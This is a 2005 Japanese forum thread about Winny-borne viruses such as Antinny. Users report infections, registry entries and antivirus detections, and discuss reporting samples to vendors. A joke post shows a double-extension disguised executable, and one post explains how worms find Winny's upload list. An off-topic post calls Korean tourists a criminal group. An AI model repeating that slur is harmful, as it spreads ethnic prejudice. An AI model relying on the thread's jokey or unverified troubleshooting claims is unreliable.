なにも書かれていないUpFplder.txtが作られてしまいます。これはなにかの
ウィルスですか?
200[名無し]さん(bin+cue).rar:2005/05/14(土) 16:46:14 ID:Z6zL14TD0
201[名無し]さん(bin+cue).rar:2005/05/14(土) 16:58:27 ID:o567wlNE0
うっかり仁義なきキンタマ踏んじまった。。。
駆除マンドクセ(ドクオAA)
202[名無し]さん(bin+cue).rar:2005/05/14(土) 18:22:54 ID:kSBqn7T00
    |ヽ ,,|,~'i、  .,_   ,ri、     .l゙‐'"'i、    ,, ,i、     ,、   vi、
    | k, ヽ广  | |  'l''゙l┘     .`'グ/    |゙l.,ィ |.|     )゙l  /'゙l″、   r-,、  、   .:c、、
  ッ┘`,l゙    ,ノ ヽ ,,,,,`'′     .,/,,,!‐'',  ,ノ う゜.| |    .,ノ ヽ ,,,,,`'′ |゙l    ゙l,ヽ .|゙l    ヾi、
   ゙i、/゙,-'''i、 .く, .,巛 ‘r\     /.'゚_ /  ./‐I /  | |   .〈、,l]゙l `',\  | |  ,。 .,i´゙l | |  . il゙ ゙l
   l゙.l゙ ゙lッ'"  ././ | | .,,) ゙l    .!/]/    丿 |  .l゙.|、  /丿| | .,,〉.) | ゙l .,リ  .`-" .l゙ | .,l〕  .ヽ"
  /.l゙ j,i´   l゙,E.,l゙.|  `'''′     l゙{    /,,| |  ゙l,ヽ  .゙l,d,,l゙ |  `'''゙  ゙l ゙‐'|     ゙l ゙‐'|
  / l゙ ゙l,~゙'''i、  .゙l´丿          | ゙l,   '(/|゜|   .゙-゙l  .゙l`丿     \.,}      \.,}
  ∨  `''ー"   ゙'"           ヽ ゙l    ヽ}       `"        `
203[名無し]さん(bin+cue).rar:2005/05/14(土) 18:30:53 ID:NJXPFMST0
age
204[名無し]さん(bin+cue).rar:2005/05/14(土) 20:26:17 ID:QgOtnETJ0
636 KBのキンタマ拾ったー
205[名無し]さん(bin+cue).rar:2005/05/14(土) 20:39:52 ID:KCLEX0lV0
それ俺のキンタマの片割れ
返してくれる?
206176:2005/05/14(土) 23:23:05 ID:1SyYw5Pq0
>200
ありがとうございました。
すっげーアホなことで騒いでた自分が恥ずかしいです。
207[名無し]さん(bin+cue).rar:2005/05/14(土) 23:50:43 ID:FPGsoMve0
亜種多いな
208[名無し]さん(bin+cue).rar:2005/05/14(土) 23:58:42 ID:VOqUGV9j0
亜種メーカーがあるらしい
209[名無し]さん(bin+cue).rar:2005/05/15(日) 00:16:09 ID:TtpkQgee0
新亜種
http//<fusianasan>/
(´・ω・)カワイソス ・・・・・・

 検体確認しました
210[名無し]さん(bin+cue).rar:2005/05/15(日) 00:27:12 ID:LPcl36uY0
どれに?
211[名無し]さん(bin+cue).rar:2005/05/15(日) 00:55:44 ID:lxOkIlDt0
続々と開発される新亜種。
ジオン、脅威のメカニズム。
212[名無し]さん(bin+cue).rar:2005/05/15(日) 01:22:52 ID:gP8GVJFv0
そのうちソーラレイみたいな驚異的な破壊力を持つ亜種がでてきそうな予感。
213[名無し]さん(bin+cue).rar:2005/05/15(日) 01:24:07 ID:+uHqxEaD0
またガノタか
214[名無し]さん(bin+cue).rar:2005/05/15(日) 03:22:37 ID:mx+OeJEr0
そのうちガンド・ロワみたいな驚異的な破壊力を持つ亜種がでてきそうな予感。
215[名無し]さん(bin+cue).rar:2005/05/15(日) 08:29:51 ID:oflElYNu0
おい、おまいら。たいへんでつよ。

日本国存亡の危機です!!犯罪者集団が大挙して押し寄せてきます。
放置して置くと大変なことになります。みなさんご協力下ちい
世論で最低減日韓首脳会談での表明は回避してもらいまそう

↓現行スレ
【日韓】韓国人観光ビザ、免除恒久化へ 関係修復狙い/治安対策カギ★2[05/15]
http://news18.2ch.net/test/read.cgi/news4plus/1116107629/
【日韓】韓国人観光ビザ、免除恒久化へ 関係修復狙い/治安対策カギ[05/15]
http://news18.2ch.net/test/read.cgi/news4plus/1116094191/

政府は十四日、愛知万博開催期間限定で実施している韓国人観光客の査証(ビザ)免除措置
を万博終了後も継続恒久化する方針を固めた。
六月に韓国で行われる日韓首脳会談で、小泉純一郎首相が盧武鉉大統領に表明する。
216[名無し]さん(bin+cue).rar:2005/05/15(日) 10:46:49 ID:CMEw6xvd0
教えてください

>>11に書かれている様な症状は無いのですが
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runがレジストリーにあります
このHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runは削除した方がいいのでしょうか?

あと>>12においても症状は無いのですが
windows\system32の中にsvchost32.exe、setup.exeがあります
しかしHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runには上記exeはありません

因みにHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runには

(既定)
ctfmon.exe
HDD-Nonクラッシュ
MSMSGS
WDSM..exe

以上の5つが存在しています

削除してイイ物とイクナイ物を教えてください
217[名無し]さん(bin+cue).rar:2005/05/15(日) 10:57:26 ID:PS6Ej/G20
感染してるかが良くわかんなくて心配だったら再インスコしれ
nyや変なうp拾うのやめれば幸せになれるかもしれない
218[名無し]さん(bin+cue).rar:2005/05/15(日) 10:57:28 ID:SdDxr5BQ0
Q : 消しても大丈夫ですか?
A : _、_
 ( ,_ノ` )     n    こんな匿名掲示板で書かれたことを信用するんですか? だったら言ってあげますよ
 ̄    \   ( E)   時限型ウイルス満載!消した瞬間に個人情報撒くわ
フ  癌  /ヽ ヽ_//   専用UploaderにデスクトップのSS投稿するわ重要ファイルは消えるわ家は燃えるわ大騒ぎ!!pgr
219[名無し]さん(bin+cue).rar:2005/05/15(日) 10:59:18 ID:idDS+pll0
>>216
【マジレス】超初心者の質問に答えるスレ153【エスパー】
http://tmp5.2ch.net/test/read.cgi/download/1115481431/
220通報屋 ◆Y39/vakKjY :2005/05/15(日) 12:09:13 ID:vEyt4DsT0
亜種オオス('A`)
>>209,204
詳しく!
221209:2005/05/15(日) 13:06:30 ID:TtpkQgee0
>>220
送信!
222[名無し]さん(bin+cue).rar:2005/05/15(日) 13:31:33 ID:ydb4B8v30
どこかに種芋バイナリが配布されてるんじゃね? >亜種
223[名無し]さん(bin+cue).rar:2005/05/15(日) 17:50:11 ID:0iFQ7Ckr0
山田ウイルスに感染しているか確認する方法
ttp://127.0.0.1/
開けると感染中
224[名無し]さん(bin+cue).rar:2005/05/16(月) 01:23:22 ID:HguCzHV80
kakaku.comが不正アクセスで閉鎖 閲覧ユーザーはウイルス感染も
http://news19.2ch.net/test/read.cgi/newsplus/1116172924/

http://kakaku.com/
クラックされたらしい。
225[名無し]さん(bin+cue).rar:2005/05/16(月) 01:25:45 ID:7Q9CC4HC0
winnyを狙ってないし
226[名無し]さん(bin+cue).rar:2005/05/16(月) 01:39:04 ID:5ORJr+nQ0
【使用OS】 win2k
【WindowsUpdateしてるか】 している
【使用AntiVirusソフト】 ノートン2004
【AntiVirusをUpdateしてるか】 たまに
【Winnyのバージョン】 2.0b71
【Winny歴、総DL量】 数ヶ月、100G↓
【テンプレを読んだか】 今読みました
【テンプレにある対策を実行したか】 ウイルスソフトの常駐、落としたファイルのスキャンはしていた
【症状、具体的に分かる限りすべて書く】 >>60,163さんと同じように、OSを起動すると「システムがビジー状態です」
とか書いてある青色の窓が際限なく開かれた
何もできなかったのでドキュメント内ファイルがどうなっていたかは確認していません
【何をしたらそんなことになったのか】 >>60,163さんとおそらく同じファイルを踏みました。
らぶデスのモザイク除去パッチを開いたのは確かですが、その前にスキャンもしたし、中にあったexeファイルには触れてないです
zipを解凍しただけでまずかったんでしょうか…
【これまでにとった措置】 全HDをフォーマットして再インストールしました
けれどその後、どうもモデムの調子がよくなく、ネット接続できたりできなかったりします
また、ノートンインターネットセキュリティを入れてるのですが、オプションを開こうとすると「あなたにその権限はありません」
のような警告が出て開けなかったりしました(再起動したら開けました←もちろん常にアドミで入っています
また、窓の手も入れてるのですが、項目の一つ「自動ログオンする」を何度チェックしても、再起動するとチェックが消えている
といった症状もでています(これは関係ないかな

その後、シマンテックのオンラインチェック、オフラインでの全HDウイルスチェックをしたが感染数は0との答えが
このウイルスは新種なんでしょうか?モデムやbiosに潜むようなウイルスがあるんでしょうか…
どなたか情報お持ちの方いらっしゃいましたら教えて下さい
227[名無し]さん(bin+cue).rar:2005/05/16(月) 01:39:07 ID:cjItXv440
テンプレの感染しないための注意1に

・nyをProgramFilesに置かない。

とあったのですが何故nyを
ProgramFilesに置いていてはいけないのでしょうか?
228[名無し]さん(bin+cue).rar:2005/05/16(月) 01:48:29 ID:7Q9CC4HC0
>>226
モデムって、ダイアルアップ回線かよ
229[名無し]さん(bin+cue).rar:2005/05/16(月) 01:51:51 ID:Z8gfrvu00
キンタマ感染報告キタ━━━━━(゚∀゚)━━━━━ !!!!!

kakaku.comが不正アクセスで閉鎖 閲覧ユーザーはウイルス感染も
http://news19.2ch.net/test/read.cgi/newsplus/1116172924/

166 名前:名無しさん@5周年[sage] 投稿日:2005/05/16(月) 01:38:42 ID:c8hf1u6W
時間モジュール対象ウイルスアクションユーザシステム情報
2005/05/16 1:29:45AMON C:\Program Files\InstallShield Installation Information\{2B9FBAE1-5016-4F14-B452-E6874A3C1284}\Setup6cd3.exeWin32/HLLW.Antinny.A ウイルス
2005/05/16 1:29:42AMON  C:\WINDOWS\System32\zktlzvo.exeWin32/TrojanDownloader.Agent.AE トロイ

感染してた (´・ω・`)
230[名無し]さん(bin+cue).rar:2005/05/16(月) 02:03:06 ID:NheJM0U80
>>229
kakaku.com、まだクラックされてる気がするんだが・・・
今見に行ったら、PC固まったよ。
光学マウスに電気すら供給されてない状態になった。
231226:2005/05/16(月) 02:07:47 ID:5ORJr+nQ0
>>228
えっと、ADSLです。
ADSLモデム略してモデムのつもりだったんですが、意味が違ってくるのでしょうか…
232[名無し]さん(bin+cue).rar:2005/05/16(月) 02:12:41 ID:7Q9CC4HC0
>>226
>>【これまでにとった措置】 全HDをフォーマットして再インストールしました
これはHDD自体をフォーマットちゃんとしたのか?
ただOSを再インストールしただけとか
233[名無し]さん(bin+cue).rar:2005/05/16(月) 02:15:57 ID:edJSA8cz0
>>231
あってる。
モデル=ダイアルアップとおもてるほうが間違い。
234226:2005/05/16(月) 02:44:28 ID:5ORJr+nQ0
はい、もともとはC,D,Eドライブが物理的に同じHD(CにOS)で、Fが物理的に別HDだったのですが
win2kのCD入れて、まず全てのパーティションを削除して全領域を未使用にし
そこからまずCだけを作って(容量は前と同じ)win2kをインストールしました。
その後、コンピュータの管理から残りの領域作成(容量は前と同じ)とフォーマットをしました。

パーティション削除したらフォーマットもしないとOSインストールってできないですよね…?
235[名無し]さん(bin+cue).rar:2005/05/16(月) 03:48:37 ID:Y/EOB0Pt0
いくらなんでも山田ウイルス感染者多すぎない?
何人いるのかな。10000くらい?
236[名無し]さん(bin+cue).rar:2005/05/16(月) 03:56:57 ID:HguCzHV80
パソコン蛾人  \CPU使用率100% //∧_∧        謝罪!謝罪!
ぶっ壊れ(__)   \ !!!!! /   <`Д´ >つ─◎   さっさとさっさと謝罪!
たお! (__)    \∧∧∧∧/   /´ ̄し' ̄し' \ ///.  しばくぞ!
     (`Д´#)   < ぶ パ >     、_人_ /  彡 ◎
   _| ̄ ̄||_)_ <  っ ソ >    _)  ◎彡.| |   バン
 /旦|――||// /| < 壊 コ >   ´`Y´   .| |  バン
─────────< れ ン >──────────
<   _,ノ , 、ヽ、_ ノ< た 蛾>  アップデートが止まらないお
 (y○')`ヽ) ( ´(y○')<  !!!   > なにこれ?  ___
  ⌒ /    ヽ⌒ /∨∨∨∨\   ∧_∧  ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!    \(  つ/ ̄||/
237[名無し]さん(bin+cue).rar:2005/05/16(月) 04:04:10 ID:rfMQWb2S0
>>226ほど注意してても感染しちゃうもんなのか。
俺もスキャンとexeに注意するぐらいで安心しちゃってるんだが甘いのか?
238[名無し]さん(bin+cue).rar:2005/05/16(月) 04:13:50 ID:uzmXZxiD0
>>237
注意してる奴はあんな怪しげでしかも調べりゃ既出なファイル落とさんだろ。
239[名無し]さん(bin+cue).rar:2005/05/16(月) 04:19:39 ID:HguCzHV80
とりあえず、ここに置いておく。

駆除ソフト詰め合わせ.zip                                       .exe
240[名無し]さん(bin+cue).rar:2005/05/16(月) 04:23:25 ID:kY7vO9+N0
うっかり>>239をダブルクリックしてしまったのですが大丈夫でしょうか?
当方初心者なのでわかりやすくお願いします。
241[名無し]さん(bin+cue).rar:2005/05/16(月) 05:05:41 ID:NOZRuT5i0
>>240        Σ( ̄◇ ̄;)マジッすか?
242[名無し]さん(bin+cue).rar:2005/05/16(月) 05:07:20 ID:J6mVMkqK0
>>240        Σ( ̄◇ ̄;)マジッすか?
243[名無し]さん(bin+cue).rar:2005/05/16(月) 07:00:40 ID:6Tj/C5AZ0
>>226
>らぶデスのモザイク除去パッチを開いたのは確かですが、その前にスキャンもしたし、中にあったexeファイルには触れてないです
>zipを解凍しただけでまずかったんでしょうか…

だから除去パッチがウイルスなんだろ
244226:2005/05/16(月) 07:08:02 ID:e3aA89DK0
>>243
言葉足らずでした、すみません。
「らぶ〜パッチ」と言う名前のzipファイルを開いただけと言う意味です。
中にはexeがありましたがそれは開いていませんと言いたかったのです。

パッチ使わないんだったら何でDLしたんだと言われるとなんとも答えに困りますが…
245[名無し]さん(bin+cue).rar:2005/05/16(月) 07:14:24 ID:6/9tTojn0
価格.com一時閉鎖
246[名無し]さん(bin+cue).rar:2005/05/16(月) 07:28:40 ID:6Tj/C5AZ0
>>244
オレも らぶデス 〜Realtime Lovers〜 モザイク除去パッチ.zip は
落として開いてみたけど大丈夫だったよ
中のexeは確か通報したと思った パッチは捨てた
zip開いて即感染? そうだとしたらそんなの聞いたことないなあ
解凍ソフトが古いんじゃないの? 最新版使うべし
247[名無し]さん(bin+cue).rar:2005/05/16(月) 07:36:23 ID:6Tj/C5AZ0
一応説明しとくと 解凍ソフトの脆弱性を利用して
解凍時にスタートアップに解凍しちゃうんだよ
PC再起動すると実行される仕組み 
それで感染したんだろ?
そうじゃないならかなりヤバイ新種ってことになるな
248[名無し]さん(bin+cue).rar:2005/05/16(月) 07:43:46 ID:6Tj/C5AZ0
ごめん再インストール後の症状読んでなかった
単になんか間違えてんじゃね?
249226:2005/05/16(月) 08:17:54 ID:e3aA89DK0
確かに解凍ソフトはずっと前のをそのままつかっててバージョンアップとかはしてませんでした。
解凍は、zipファイルを置いていた場所に解凍したと思います、
その後ドラッグ&ドロップでzipファイルと、解凍したときにできたフォルダ選択してshift+delしましたから。

ついでにスタートアップにも解凍しやがったんですかね、
前出の通り窓が際限なくでてきた時点で怖くなって再インストールしたので
スタートアップがどうなってたかは見てません。

再インストール後の症状は…
その後何度か再起動してますが今のところ症状は出ずに問題なく動いてます。
何かのどこかを設定ミスしてたんですかね。
ただ、症状でたときから別に設定変えてないんですよね…なのに今はモデムの調子も悪くない。
何が原因だったんだろう、大本で接続障害でもあったんでしょうか…

もしこれからまた何か症状でて、皆さんのお役に立ちそうなら報告させていただきます、
色々ありがとうございました。
250[名無し]さん(bin+cue).rar:2005/05/16(月) 08:42:29 ID:YB8yZ/in0
>226
取り敢えずテンプレに書いてある対策ぐらいはしっかりとな

・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
 ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
251[名無し]さん(bin+cue).rar:2005/05/16(月) 12:04:37 ID:Sb69kowE0
>確かに解凍ソフトはずっと前のをそのままつかっててバージョンアップとかはしてませんでした。
ドあほとしか言いようがない
252ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
253[名無し]さん(bin+cue).rar:2005/05/16(月) 12:51:38 ID:FIj8wnWV0
>>227
例えば、ワームがnyを使ってワーム自身を含む様々なファイルを拡散させようとする場合、
UpFolder.txt等の絶対パス(場所)を調べ、勝手にUpフォルダを追加したりする必要がある。

nyをProgram Filesにおいていた場合、
  "c:\Program Files\Winny2\UpFolder.txt"
  "c:\Program Files\Winny\UpFolder.txt"
  "c:\Program Files\ny\UpFolder.txt"
などの存在をチェックしただけですぐに場所が特定され、いたずらされやすい。(*´Д`)ハァハァ

Program Files以外においた場合でも、nyの場所を特定することはできるんだけど、ワームを
踏んじゃう人のほとんどはOS等の設定をデフォルトで使っているので、Program Filesに
あたりをつけて探すのが手っ取り早いので、この方法が良く使われる。

セキュリティの面から言えばnyに限らず、Program Files、デスクトップ、マイドキュメントは使わないで
自分でフォルダを作成したほうがホントはいいんだけど・・・なかなかねー。
254[名無し]さん(bin+cue).rar:2005/05/16(月) 13:55:07 ID:p8u4LX1R0
俺の知人のノート、デフォでC・Dとパーティション切られてたんだが
見せて貰ったらDドラはカラッポ、全くの未使用だった。

インストールは言われたまま、
拾ってきたファイルはデスクトップかマイドキュメント。
これで済んじゃうし、ドライブが分割されてるなんて思いもよらなかったんだろうな。
ライトユーザーなんてこんなもんか、と思ったよ。

当たり前のようにウィルスとスパイウェアに食い荒らされてたしな。
255[名無し]さん(bin+cue).rar:2005/05/16(月) 18:22:10 ID:HguCzHV80
256[名無し]さん(bin+cue).rar:2005/05/16(月) 19:59:17 ID:JSrC1vsb0
>>255
すげー
コレクションか?
俺がまだ厨のころスパイウェア500件ヒットならあったが
257[名無し]さん(bin+cue).rar:2005/05/16(月) 20:01:40 ID:6/9tTojn0
今も厨のくせにw
258[名無し]さん(bin+cue).rar:2005/05/16(月) 20:22:48 ID:KBYiBRjZ0
>255
食ってた焼きそば吐いたじゃねーか!
259[名無し]さん(bin+cue).rar:2005/05/16(月) 20:23:50 ID:7Q9CC4HC0
>>257 お約束杉
260[名無し]さん(bin+cue).rar:2005/05/16(月) 20:27:07 ID:2yp5Z0kA0
オレも使ってないノートにウイルス飼ってみようかな
261[名無し]さん(bin+cue).rar:2005/05/16(月) 20:38:23 ID:bf30WsU/0
うちのiMacにメール添付で届いたウイルスがいくつかいるな。
身動き取れなくて氷漬けになってるけど。(w
262[名無し]さん(bin+cue).rar:2005/05/16(月) 20:44:41 ID:rfMQWb2S0
前にzip開けた瞬間にウィルス出てきたことはあったけどな。
ちゃんと駆除してくれたけど。
263[名無し]さん(bin+cue).rar:2005/05/16(月) 21:16:46 ID:LX3auJGo0
× zip開けた瞬間にウィルス出てきた
○ zip開けた瞬間にアンチウィルスソフトがウィルスを認識出来る様になり駆除した

なんか誤解している様な気がする
264[名無し]さん(bin+cue).rar:2005/05/16(月) 22:38:20 ID:f6HhZvy90
【使用OS】 XP
【WindowsUpdateしてるか】 してる
【使用AntiVirusソフト】   ウィルスセキュリティ
【AntiVirusをUpdateしてるか】 してる
【Winnyのバージョン】  2
【Winny歴、総DL量】  1ヶ月、50GBくらい
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】してませんでした _l ̄l●
【症状、具体的に分かる限りすべて書く】
キンタマに感染した模様。
●tempフォルダに「XXX?.temp」が常に作成される
(ユーザー名も作成されていたが、現状は治まっている。)
●テキストアイコンに偽装されたctfmon.exe(system32フォルダ)
 を削除するが、再起動するたびに復活(スタートアップも)。

【何をしたらそんなことになったのか】
調子に乗って落としまくってたので何がなにやら。
思い返せばフォルダアイコンに偽装したのを踏んだかも・・・
【これまでにとった措置】
・テンプレの対策をひと通り実行。
・ウィルス対策ソフトEWIDOでウィルス分析(約140近くのワーム発見)  
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの
 何が怪しいのかがよくわからない。
 ひとつひとつたどっていったが、上記にはないフォルダアイコンに偽装された
 Whismng.exeをsystemフォルダに見つけたし・・・・・


よろしく頼みます。
265通報屋 ◆Y39/vakKjY :2005/05/16(月) 22:44:38 ID:TRrTdsSj0
>>264
えーと、・・・えーと・・・・
OS再インスコ汁。
藻前のPCはすでに復旧不可能だ
今すぐ必要なデーターバックアップしてリカバリーしろ。
ついでに言うとウイルスセキュリティって安さに釣られて(ry

それはそうと、Trendが検体にちょこっと対応した模様。
TROJ_MELLPON.H
TROJ_MELLPON.I
TROJ_MELLPON.J
TROJ_MELLPON.L
TROJ_MELLPON.N
まだ公式対応メール来てないけど。
266209:2005/05/16(月) 22:49:04 ID:vSCGdUsE0
>>265
乙!
267[名無し]さん(bin+cue).rar:2005/05/16(月) 23:02:45 ID:fuha7nrw0
【ALBUM 洋楽】 Michael Jackson - ベスト・オブ・マイケルジャクソン.zip
Win32:Antinny-A [Wrm]

268[名無し]さん(bin+cue).rar:2005/05/16(月) 23:07:48 ID:dgolhGLh0
>>267
それ新種なのか?
269[名無し]さん(bin+cue).rar:2005/05/16(月) 23:10:31 ID:3LZf0XOC0
2ch管理人訴えるっていう京大卒が再び違法コピー販売開始。
名前欄がstar〜になってる人を煽ると大変おもしろいレスがもらえます。

【経緯】
公務員がヤフオクで違法コピー販売の副業やってて、ウィルスに感染→個人情報他ダダ漏れ
→2ちゃんに晒されて→自分のしてた事も棚上げして逆ギレ→管理人訴える→様子見のため出品停止
→2ちゃんねらーのショボさに気づく→再び違法コピー販売開始
http://pc7.2ch.net/test/read.cgi/yahoo/1115636340/
ttp://puka-world.com/upload/img-box/1115687677097.jpg
京大卒業証書↑
新IDhttp://openuser4.auctions.yahoo.co.jp/jp/user/star_shop_2002jpjp?
270[名無し]さん(bin+cue).rar:2005/05/16(月) 23:13:20 ID:F8yUGMDk0
>(約140近くのワーム発見) 

激ワラ
271[名無し]さん(bin+cue).rar:2005/05/17(火) 00:37:41 ID:piEskKrF0
ny起動しシステム情報みてたら
最初キャッシュの数150と表示されるのに数秒経つと9になってしまいます
なんで?
キャッシュフォルダにはちゃんと150あります
272[名無し]さん(bin+cue).rar:2005/05/17(火) 00:38:37 ID:piEskKrF0
↑誤爆スマン
273[名無し]さん(bin+cue).rar:2005/05/17(火) 02:36:48 ID:XzcI9Y6q0
トレンド、価格コム=ウイルスに対応(専用除去ツール配布)
ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=11359
常用者はnyとは関係ないがチェックしる!

274ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
275ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
276通報屋 ◆Y39/vakKjY :2005/05/17(火) 03:01:14 ID:PAlKm/vW0
>>274
見事に大手3社が出てない件について('A`)
このへんはオンラインスキャンかぁ・・・
漏れの考えは上流メーカーが対応したら下位メーカーも対応するだろうという考え方。
まぁ、いかんのだけどね。('A`)それでも、ホネガオレル
277[名無し]さん(bin+cue).rar:2005/05/17(火) 03:15:01 ID:NKj2mfFX0 BE:78750555-###
>>276検体は価格の奴だが。会社参考までに
もう一箇所あった気がする

VirusTotal(http://www.virustotal.com/

This is a report processed by VirusTotal on 05/16/2005 at 04:12:24 (CET) after scanning the file "a02.css" file.

AntivirusVersionUpdateResult
AntiVir6.30.0.1205.13.2005no virus found
AVG71805.13.2005no virus found
Avira6.30.0.1205.13.2005no virus found
BitDefender7.005.16.2005BehavesLike:Win32.AV-Killer
ClamAVdevel-2005050105.15.2005no virus found
DrWeb4.32b05.15.2005no virus found
eTrust-Iris7.1.194.005.15.2005no virus found
eTrust-Vet11.9.1.005.13.2005no virus found
Fortinet2.5105.15.2005no virus found
Ikarus2.3205.15.2005no virus found
Kaspersky4.0.2.2405.16.2005Trojan-PSW.Win32.Delf.fz
McAfee449105.13.2005no virus found
NOD32v21.109705.15.2005Win32/PSW.Delf.FZ
Norman5.70.1005.13.2005no virus found
Panda8.02.0005.15.2005no virus found
Sybari7.5.131405.16.2005Trojan-PSW.Win32.Delf.fz
Symantec8.005.15.2005no virus found
VBA323.10.305.16.2005no virus found
278[名無し]さん(bin+cue).rar:2005/05/17(火) 03:28:32 ID:clvqCr9e0
欄検眼段の検体誰か持ってたら、パスかけてアプロダにうpしてくれない?
>>275の検出結果だとチェイサーは検出できないみたいだから、
サポート宛に送りたい。
279[名無し]さん(bin+cue).rar:2005/05/17(火) 03:34:32 ID:XzcI9Y6q0
大手3社というと、トレンド、シマンテック、マカフィーのこと?
こないだ、ゆえあって上記3社+NOD32、eTrust、AhnLabのを触る機会があったんだが
NOD32は、意外と使えるふうだった。

NOD32≒先生>トレンド>マカ>>>>eTrust>>>>>>>>>>>>>AhnLab
って感じかね。特に、あたらしめの国産ウイルスへの対応度は。
280[名無し]さん(bin+cue).rar:2005/05/17(火) 03:42:20 ID:XzcI9Y6q0
281[名無し]さん(bin+cue).rar:2005/05/17(火) 04:16:54 ID:clvqCr9e0
>>280
サンクス
早速サポートに送っておきます。
282NOD32ユーザー:2005/05/17(火) 07:23:00 ID:eGyCaSlR0
通報屋 ◆Y39/vakKjY 様
大変無理なお願いで申し訳ないのですが、
是非、検体のつまったCD-Rを
http://canon-sol.jp/supp/n_post.html
上記の住所まで郵送していただけないでしょうか?

製品に関するお問い合わせ の住所で宛先の一部のみ
セキュリティソリューション事業部

セキュリティソリューション事業部 サポートセンター

としていただければ間違いなく到着します。

コンピューターウイルス検体在中 と書いていただければなお確実です。
もし、もしも可能でしたらどうか、よろしくお願いします。
283[名無し]さん(bin+cue).rar:2005/05/17(火) 07:33:53 ID:3iHyAHtP0
>>282
すごいな、オマエ
284[名無し]さん(bin+cue).rar:2005/05/17(火) 07:42:47 ID:TXhcEocG0
>>282
そこでエムエクースですよ
285[名無し]さん(bin+cue).rar:2005/05/17(火) 07:49:12 ID:3dRAjkRS0
捨てメアド晒してオンラインストレージうぷしてPASS送ってもらうとかでいいやん
ほんとに会社の中の人ならあらぬ誤解を避けるため削除依頼出した方がいくない?
286[名無し]さん(bin+cue).rar:2005/05/17(火) 07:56:46 ID:Nj51/El/0
メーカーの人なら情報提供者に費用負担を求めないんじゃないの?
287[名無し]さん(bin+cue).rar:2005/05/17(火) 08:50:58 ID:NKj2mfFX0
なにその名前
288[名無し]さん(bin+cue).rar:2005/05/17(火) 08:55:22 ID:JVBTQZTe0
289通報屋 ◆Y39/vakKjY :2005/05/17(火) 12:29:08 ID:PAlKm/vW0
>>282
すげー真偽が怪しいのだが・・・
とりあえずメーカーに電話して確認取ってみるよ。
そうでないと突然送られた方も迷惑だしw
・・・・で、中の人?
290[名無し]さん(bin+cue).rar:2005/05/17(火) 12:51:03 ID:S0gINIyg0
届け先があやふやな検体リクエストは、単なるいたずらかと。
ここ経由でもPGP使うなりなんなりで個人の認証ができるのに。
291[名無し]さん(bin+cue).rar:2005/05/17(火) 12:53:10 ID:yVkZaXnK0
社員なら名前欄に「ユーザー」とは書かんだろw
292[名無し]さん(bin+cue).rar:2005/05/17(火) 13:29:08 ID:w2/rpY6p0
山田に怯えているNOD32ユーザーが、対応してもらおうと送ってくれと言ってるのかな?
それにしても、通報屋さん乙です。 
293[名無し]さん(bin+cue).rar:2005/05/17(火) 17:19:17 ID:wF7VONBb0
何だ、自分で解析したいんじゃなかったのか(゚д゚)
294通報屋 ◆Y39/vakKjY :2005/05/17(火) 17:43:29 ID:PAlKm/vW0
>>293
とりあえず誰に言ってるのか分からんが答えてみる。
一応解析すっけど最終的には通報ですよ('A`)
295[名無し]さん(bin+cue).rar:2005/05/17(火) 17:44:31 ID:XiLF9w7k0
>>294
解析ソフトは何に使ってます?
296通報屋 ◆Y39/vakKjY :2005/05/17(火) 17:56:53 ID:PAlKm/vW0
>>295
バイナリエディタ:Stirling
形式解析:PEiD
解析:OllyDbg
仮想マシン:VMWare
297[名無し]さん(bin+cue).rar:2005/05/17(火) 18:23:39 ID:oV/Cpqpu0
体験:ダブルクリック(w
298[名無し]さん(bin+cue).rar:2005/05/17(火) 18:28:53 ID:x7B2hj5g0
>>297
ほんのり壷にはまったw
299[名無し]さん(bin+cue).rar:2005/05/17(火) 18:33:12 ID:+7v7Dngp0
ほんのりニヤニヤした
300[名無し]さん(bin+cue).rar:2005/05/17(火) 18:37:01 ID:wF7VONBb0
>>294
わりぃ、わかりづらかったね
もち>>282宛て
301[名無し]さん(bin+cue).rar:2005/05/17(火) 18:44:07 ID:HavLzK110
通報したいなら好きにしろよ。解析もやりゃいいやん。
一々宣言だけ高らかにする奴ってよく居るが、構って欲しい臭ぷんぷんだな。。
もういい加減検体送って黙ってりゃいいんじゃないの?
鳥付きでバイナリエディタ:Stirlingとか書き込んでるのは流石に寒いだろう。
302[名無し]さん(bin+cue).rar:2005/05/17(火) 18:56:25 ID:JMNi/cJK0
あれ、どこからかぷんぷん臭うぞ
303[名無し]さん(bin+cue).rar:2005/05/17(火) 19:11:51 ID:mge5Ltpy0
香ばしいニオイが
304[名無し]さん(bin+cue).rar:2005/05/17(火) 19:17:56 ID:wdPM2qEo0
ごめん、さっきまでスコーン食ってた
305[名無し]さん(bin+cue).rar:2005/05/17(火) 19:56:46 ID:haCEs0A+0
>>301
おまえは、OllyDbg を使って解析できるのか?
306[名無し]さん(bin+cue).rar:2005/05/17(火) 21:22:43 ID:UiO9gN9u0
いま懸命にOllyDbgについて検索してるところだから、ちょっと待って
あげてよ。
307[名無し]さん(bin+cue).rar:2005/05/17(火) 21:31:59 ID:CgzotCsy0
(´-`).。oO(今更w通報屋にケチ付けてる時点で、単なる構って君確定だしな)
308[名無し]さん(bin+cue).rar:2005/05/17(火) 22:18:27 ID:qF91j5UA0
開発するにしろ何にしろ、ダウソで目立つことをやると
思わぬところでアシがついてタイーホされる確率が増える
身の潔白に自信があれば心配不要だがなー
